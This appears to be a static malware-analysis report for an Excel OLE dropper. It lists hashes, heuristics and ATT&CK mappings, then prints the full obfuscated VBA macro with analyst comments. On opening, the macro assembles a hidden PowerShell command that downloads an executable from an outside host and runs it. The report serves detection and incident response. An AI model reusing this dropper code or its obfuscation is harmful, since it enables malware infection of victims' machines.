Xls.Dropper.Generic-6595971-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 a67f1f172d846bb7…

MALICIOUS

Office (OLE)

38.0 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2019-01-25
MD5: 147590aa93ff42e4bda03d4745d165b9 SHA-1: 6ff898bafe41969119fc0fcacfd09aca69d66c1d SHA-256: a67f1f172d846bb7b2e82d2d9d423d0fe12292f2eb4c04e5341acffaa74c800c
240 Risk Score

Malware Insights

Xls.Dropper.Generic-6595971-0 · confidence 95%

MITRE ATT&CK
T1059.001 PowerShell · T1566.001 Spearphishing Attachment · T1059.005 Visual Basic

The file contains VBA macros, including a Workbook_Open event, which is a common technique for executing malicious code upon opening an Excel document. The macro uses obfuscated string concatenation to construct and execute a PowerShell command. This command is designed to download and execute a second-stage payload, as indicated by the critical heuristic firings for Shell() calls and split keyword obfuscation for 'PowerShell'.

Heuristics 5

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2754 bytes
SHA-256: e29ba7768fe745cd4fdb47b55844c244e99a2bb436962bd06eb698c7ed141fd3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header as decoded by olevba. VB_Name "ThisWorkbook" means this is the
' workbook's own object module, which is why a Workbook_Open event handler
' placed here is valid and runs as soon as the document is opened with macros
' enabled (heuristic OLE_VBA_WBOPEN above).
' String-fragment helper (no side effects). Returns  VIr','N  — two of the
' -f arguments that litercal joins with 'on', 'eN', 't' and 'mE' so that
' PowerShell reassembles the word "Environment" at run time; the word itself
' never appears in any single literal (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION).
Function mmetalo()
mmetalo = "V" + "I" + "r'" + ",'N"
End Function
' Assembles the first PowerShell statement of the payload: it assigns to the
' variable $7d0mK6 the result of [Type]( "<-f format string>" ), where the
' format string and its arguments ('on','eNVIr','Nt','mE') evaluate to the type
' name "Environment". In other words $7d0mK6 becomes [Environment], obtained
' without writing that identifier anywhere in the macro.
' The \"" sequences are VBA-escaped quotes that become \" in the command line,
' i.e. quotes that survive the outer cmd /c "..." wrapper — TODO confirm against
' the rebuilt command in Workbook_Open.
' Note: mortalcc is defined further down; VBA resolves it at call time.
Function litercal()
tellaboutme = "}\"" -" + "f '" + "on'"
goovers = mmetalo + "t'," + "'m" + "E') ;  "
litercal = "$7" + "d" + "0m" + "K6 = [" + mortalcc + "}{2" + tellaboutme + ",'eN" + goovers
End Function
' String-fragment helper. Returns  Type](\"{1}{0}{3  — the "[Type](" cast
' (the opening "[" is supplied by litercal) plus the first three placeholders of
' the -f format string that spells "Environment". lomadus only exists to keep
' "Type]" out of a single literal.
Function mortalcc()
lomadus = "p" + "e]"
mortalcc = "Ty" + lomadus + "(\""{" + "1}{0" + "}{3"
End Function
' Opens the retry loop of the PowerShell payload:
'   do { &("{1}{0}" -f 'ep','sle') 31 ; ${D`es} = $7d...
' i.e. a 31-second "sleep" (the cmdlet name is rebuilt via -f so it is not a
' literal) followed by assignment of $Des — the backtick inside ${D`es} is a
' PowerShell escape that does not change the variable name. The rest of the
' assignment ($7d0mK6::GetFolderPath("Desktop")) is appended in Workbook_Open.
' The long sleep before any network activity is consistent with sandbox
' timeout evasion — plausible, not proven by the code alone.
Function asdefas()
togaclose = "{D`e" + "s} =  $7d"
asdefas = "d" + "o{&(\""{1}" + "{0}\"" -f'ep','" + "sle'" + ") 31;$" + togaclose
End Function
' Returns the format string  ("{0}{2}{1}{3}{5}{6}{4}"-f'Sy','te','s','m
' Workbook_Open appends the remaining arguments  .Ne','enT','t.WeB','ClI')
' so the seven -f arguments are 'Sy','te','s','m.Ne','enT','t.WeB','ClI' and the
' placeholder order yields "System.Net.WebClient" — the .NET type used to
' fetch the second stage, again never present as one literal.
Function fostport()
fostport = "(\""{" + "0}" + "{2}{" + "1}{3}{" + "5}{6}" + "{4}\""" + "-f'" + "S" + "y','t" + "e','s" + "','m"
End Function
' Returns the middle slice "OaDfiLE.IN". Workbook_Open wraps it as
' "dOwNL" + dellcomp + "VokE(" → DownloadFile.Invoke( — the WebClient method
' call that writes the remote file to disk. Mixed case is deliberate; match it
' case-insensitively in any detection rule.
Function dellcomp()
dellcomp = "OaDfiLE.IN"
End Function
' Returns the launcher prefix of the whole command:
'   CMd /c" PoWerSHeLL -NoloGO -EXecUtIONPO ByPass -WInDOw hiDdEN -nOPrOfIL -NoniNTER "
' i.e. cmd.exe /c running powershell.exe with -NoLogo, -ExecutionPolicy Bypass,
' -WindowStyle Hidden, -NoProfile and -NonInteractive. The switches are both
' mixed-case and truncated (PowerShell accepts any unambiguous prefix), so a
' detection that looks for the full, lower-case switch names will miss this;
' normalise case and match on prefixes, and key on the process chain
' EXCEL.EXE → cmd.exe → powershell.exe. The run of spaces is padding from the
' original, not significant.
Function enteresdum()
enteresdum = "CM" + "d       /c""" + "       PoWe" + "rSHeLL  -N" + "oloGO -E" + "XecUt" + "IONPO B" + "yPass -W" + "InDOw  hi" + "DdEN  -n" + "OPrOfI" + "L -N" + "oniNTER """
End Function
' Returns "sktop"; Workbook_Open prefixes "De" to form the
' GetFolderPath("Desktop") argument — the dropped .exe lands on the user's
' Desktop.
Function faxadnphone()
faxadnphone = "sktop"
End Function

' Closes the retry loop and starts the dropped file:
'   while(!${?}); &("{0}{2}{3}{1}"-f 'St','ocess','art','-Pr') $Des\
' ${?} is the last-command status, so the do{...} block repeats until the
' download succeeds; the -f expression evaluates to "Start-Process"; the
' trailing  $Des\  is completed in Workbook_Open with the random .exe name.
Function tramasbus()
tramasbus = "wh" + "ile(" + "!${" + "?});&" + "(\""{" + amaduespp + "t'," + "'o" + "ce" + dockstations + "e" + "s" + "\"
End Function
' Returns  0}{2}{3}{1}\"-f 'S  — the placeholder order and first argument
' opener of the "Start-Process" format string consumed by tramasbus.
Function amaduespp()
amaduespp = "0}{2}" + "{3}{1}\""-" + "f" + " 'S"
End Function


' Auto-run entry point: Excel raises Workbook_Open when the document is opened
' with macros enabled. This is the only procedure with side effects; every
' Function in this module merely returns a string fragment.
'
' Reconstructed behaviour of the command string gaeedom (obtained by joining
' the literals of the helpers in the order enteresdum, litercal, mitsubis,
' qwertyf, ugaunus):
'   cmd /c powershell -NoLogo -ExecutionPolicy Bypass -WindowStyle Hidden
'       -NoProfile -NonInteractive "<script>"
'   <script>: $7d0mK6 = [Type]('Environment') (name built via -f);
'             do { sleep 31;
'                  $Des = [Environment]::GetFolderPath('Desktop');
'                  (New-Object System.Net.WebClient).DownloadFile.Invoke(
'                      'hxxp://ravigel[.]com/tvs1.dat', "$Des\<digits>.exe") }
'             while (!$?);            ' retry until the download succeeds
'             Start-Process "$Des\<digits>.exe"
' Indicators for hunting/IR: HTTP GET for ravigel.com/tvs1.dat from a
' powershell.exe whose parent is cmd.exe under EXCEL.EXE; a new *.exe on the
' Desktop whose base name is a bare integer (see hesterff below).
Sub Workbook_Open()
' Assigned but never read anywhere in the extracted module — decoy/padding.
bloodred = "p"
' certdetThumbprint is neither declared nor assigned in the extracted source.
' If it resolves to an Empty Variant (treated as 0) the test is False and Shell
' is never reached — NOTE(review): it may be supplied by a module not in this
' extract or act as an analysis-environment check; confirm before concluding
' the sample is inert.
If certdetThumbprint > 1.1 Then
Dim hesterff As String
' Random numeric file name (0..9882760) for the dropped executable; Randomize
' seeds from the timer so the name differs per run — do not hunt on a fixed name.
Randomize
hesterff = Int(Rnd * 9882761#)
easwertyu = hesterff
' WebClient type name + DownloadFile.Invoke(<url>, "$Des\<n>.exe")
qwertyf = fostport + ".Ne','enT','t.WeB','ClI')).dOwNL" + dellcomp + "VokE(\""ht" + "t" + "p:/" + "/ravigel.com/tvs1.dat\"",\""$" + "Des\" + easwertyu + ".e" + "xe\"")}"
' do{ sleep 31; $Des = [Environment]::GetFolderPath("Desktop"); (New-Object ...
mitsubis = asdefas + "0mk" + "6::gE" + pirelliwheel + "TH(\""De" + faxadnphone + "\"")" + ";(&(" + "\""{0}{1" + "}{2}\""" + " -f'N" + "e','w-" + "','O" + "bj" + "ect') "
' }while(!$?); Start-Process $Des\<n>.exe"
ugaunus = tramasbus + easwertyu + ".ex" + "e"""
gaeedom = enteresdum + litercal + mitsubis + qwertyf + ugaunus + """"
' RibbonControlSizeRegular is an Office enum member with value 0 — the same
' value as vbHide — so the cmd.exe window should be hidden; verify against the
' Office RibbonControlSize enum. Using an unrelated constant here is itself an
' obfuscation of the "hidden window" intent.
Shell gaeedom, RibbonControlSizeRegular
End If
End Sub
' Returns "tFoLdeRPa"; Workbook_Open surrounds it with "gE" and "TH(" to form
' GetFolderPath( — the [Environment] static method used to locate the Desktop.
Function pirelliwheel()
pirelliwheel = "tFo" + "Ld" + "eR" + "Pa"
End Function
' Returns  ss','art','-Pr') $D  — the tail of the Start-Process format
' arguments plus the start of the $Des path used by tramasbus.
Function dockstations()
dockstations = "s" + "s'," + "'ar" + "t'," + "'-" + "Pr')" + " $D"
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1 object module: the extract shows no code after its attribute header.
' The undeclared certdetThumbprint referenced in Workbook_Open is therefore not
' defined here either.